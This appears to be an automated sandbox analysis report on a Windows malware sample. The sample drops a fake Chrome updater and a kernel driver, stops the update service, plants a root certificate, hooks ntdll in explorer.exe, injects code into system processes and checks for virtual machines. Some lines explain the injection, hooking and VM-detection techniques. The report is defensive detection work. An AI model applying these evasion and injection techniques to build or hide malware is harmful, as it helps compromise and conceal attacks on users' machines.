          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: file.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: file.exeStatic file information: File size 5511168 > 1048576
          Source: file.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x52a800
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmp
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Windows\System32\dialer.exeCode function: 64_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,64_2_00000001408460F0
          Source: file.exeStatic PE information: section name: .00cfg
          Source: updater.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC62ACDD push rcx; retf 003Fh30_2_00000225DC62ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC65C6DD push rcx; retf 003Fh30_2_00000225DC65C6DE
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC68ACDD push rcx; retf 003Fh30_2_00000225DC68ACDE
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6BC6DD push rcx; retf 003Fh30_2_00000225DC6BC6DE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0ACACDD push rcx; retf 003Fh36_2_00000202C0ACACDE
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AFC6DD push rcx; retf 003Fh36_2_00000202C0AFC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A6612EACDD push rcx; retf 003Fh39_2_000002A6612EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66131C6DD push rcx; retf 003Fh39_2_000002A66131C6DE
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAED9ACDD push rcx; retf 003Fh40_2_000002BAAED9ACDE
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDCC6DD push rcx; retf 003Fh40_2_000002BAAEDCC6DE
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_0000000140001394 push qword ptr [0000000140009004h]; ret 63_2_0000000140001403
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879AACDD push rcx; retf 003Fh65_2_0000026A879AACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_000001795378ACDD push rcx; retf 003Fh66_2_000001795378ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537BC6DD push rcx; retf 003Fh66_2_00000179537BC6DE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D54ACDD push rcx; retf 003Fh67_2_000002295D54ACDE
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D57C6DD push rcx; retf 003Fh67_2_000002295D57C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_00000253067EACDD push rcx; retf 003Fh68_2_00000253067EACDE
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E7C6DD push rcx; retf 003Fh68_2_0000025306E7C6DE
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3BC6DD push rcx; retf 003Fh69_2_000001845B3BC6DE

          Persistence and Installation Behavior

          Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\TEMP\jxhirqfmeznn.sys
          Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\Temp\jxhirqfmeznn.sys
          Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\ProgramData\Google\Chrome\updater.exe File created: C:\Windows\Temp\jxhirqfmeznn.sys
          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
Source: explorer.exe  User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF (0xE9 is a near relative JMP, i.e. a 5-byte inline hook on the key-enumeration entry point; the next four bytes are the rel32 displacement)
Source: C:\Windows\System32\lsass.exe  Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (200 identical entries)
Source: C:\Windows\System32\dialer.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\dialer.exe  Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Windows\System32\dialer.exe  Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle  25_2_00000001400010C0 (selects a target by image name, reads a SID sub-authority from its token, typically an integrity-level or RID check, then injects with the VirtualAllocEx / WriteProcessMemory / NtCreateThreadEx sequence)
Source: C:\Windows\System32\dialer.exe  Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle  62_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe  System information queried: FirmwareTableInformation (NtQuerySystemInformation with SystemFirmwareTableInformation returns the raw SMBIOS/ACPI tables, where hypervisor vendor strings are visible)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 6261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3503
Source: C:\Windows\System32\winlogon.exe  Window / User API: threadDelayed 2300
Source: C:\Windows\System32\winlogon.exe  Window / User API: threadDelayed 7699
Source: C:\Windows\System32\lsass.exe  Window / User API: threadDelayed 9914
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1604
Source: C:\Windows\System32\dwm.exe  Window / User API: threadDelayed 9877
Source: C:\Windows\System32\dialer.exe  Window / User API: threadDelayed 1741
Source: C:\ProgramData\Google\Chrome\updater.exe  Dropped PE file which has not been started: C:\Windows\Temp\jxhirqfmeznn.sys (the driver was written to disk but never loaded during the run, so nothing it does is reflected in this report)
Source: C:\Windows\System32\lsass.exe  Evasive API call chain: RegOpenKey,DecisionNodes,Sleep  graph_36-14897
Source: C:\Windows\System32\svchost.exe  Evasive API call chain: RegOpenKey,DecisionNodes,Sleep  graph_39-14873
Source: C:\Windows\System32\dialer.exe  Check user administrative privileges: GetTokenInformation,DecisionNodes  graph_25-480
Source: C:\Windows\System32\winlogon.exe  API coverage: 6.8 %
Source: C:\Windows\System32\lsass.exe  API coverage: 10.0 %
Source: C:\Windows\System32\svchost.exe  API coverage: 4.9 %
Source: C:\Windows\System32\dialer.exe  API coverage: 0.8 %
Source: C:\Windows\System32\svchost.exe  API coverage: 4.7 %
Source: C:\Windows\System32\svchost.exe  API coverage: 5.1 %
Source: C:\Windows\System32\svchost.exe  API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe  API coverage: 6.6 %
Source: C:\Windows\System32\svchost.exe  API coverage: 6.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376  Thread sleep count: 6261 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1376  Thread sleep count: 3503 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2896  Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6668  Thread sleep count: 2300 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6668  Thread sleep time: -2300000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6668  Thread sleep count: 7699 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6668  Thread sleep time: -7699000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5652  Thread sleep count: 9914 > 30
Source: C:\Windows\System32\lsass.exe TID: 5652  Thread sleep time: -9914000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548  Thread sleep count: 7844 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548  Thread sleep count: 1604 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596  Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6692  Thread sleep count: 245 > 30
Source: C:\Windows\System32\svchost.exe TID: 6692  Thread sleep time: -245000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7232  Thread sleep count: 9877 > 30
Source: C:\Windows\System32\dwm.exe TID: 7232  Thread sleep time: -9877000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 1508  Thread sleep count: 1741 > 30
Source: C:\Windows\System32\dialer.exe TID: 1508  Thread sleep time: -174100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7268  Thread sleep count: 255 > 30
Source: C:\Windows\System32\svchost.exe TID: 7268  Thread sleep time: -255000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7276  Thread sleep count: 256 > 30
Source: C:\Windows\System32\svchost.exe TID: 7276  Thread sleep time: -256000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7296  Thread sleep count: 256 > 30
Source: C:\Windows\System32\svchost.exe TID: 7296  Thread sleep time: -256000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7304  Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 7304  Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7312  Thread sleep count: 199 > 30
Source: C:\Windows\System32\svchost.exe TID: 7312  Thread sleep time: -199000s >= -30000s
Source: C:\Windows\System32\dialer.exe  WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\dialer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC64DCE0 FindFirstFileExW,30_2_00000225DC64DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6ADCE0 FindFirstFileExW,30_2_00000225DC6ADCE0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AEDCE0 FindFirstFileExW,36_2_00000202C0AEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66130DCE0 FindFirstFileExW,39_2_000002A66130DCE0
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDBDCE0 FindFirstFileExW,40_2_000002BAAEDBDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879CDCE0 FindFirstFileExW,65_2_0000026A879CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537ADCE0 FindFirstFileExW,66_2_00000179537ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D56DCE0 FindFirstFileExW,67_2_000002295D56DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E6DCE0 FindFirstFileExW,68_2_0000025306E6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3ADCE0 FindFirstFileExW,69_2_000001845B3ADCE0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicshutdownNT SERVICE
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
          Source: lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
          Source: svchost.exe, 00000027.00000002.3070357434.000002A660664000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: lsass.exe, 00000024.00000002.3072513252.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
          Source: dwm.exe, 00000028.00000000.1752116163.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
          Source: dwm.exe, 00000028.00000000.1752116163.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: lsass.exe, 00000024.00000002.3071488737.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735514268.00000202BFC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1741081907.000002A660613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.3069446537.000002A660613000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000027.00000000.1741101910.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
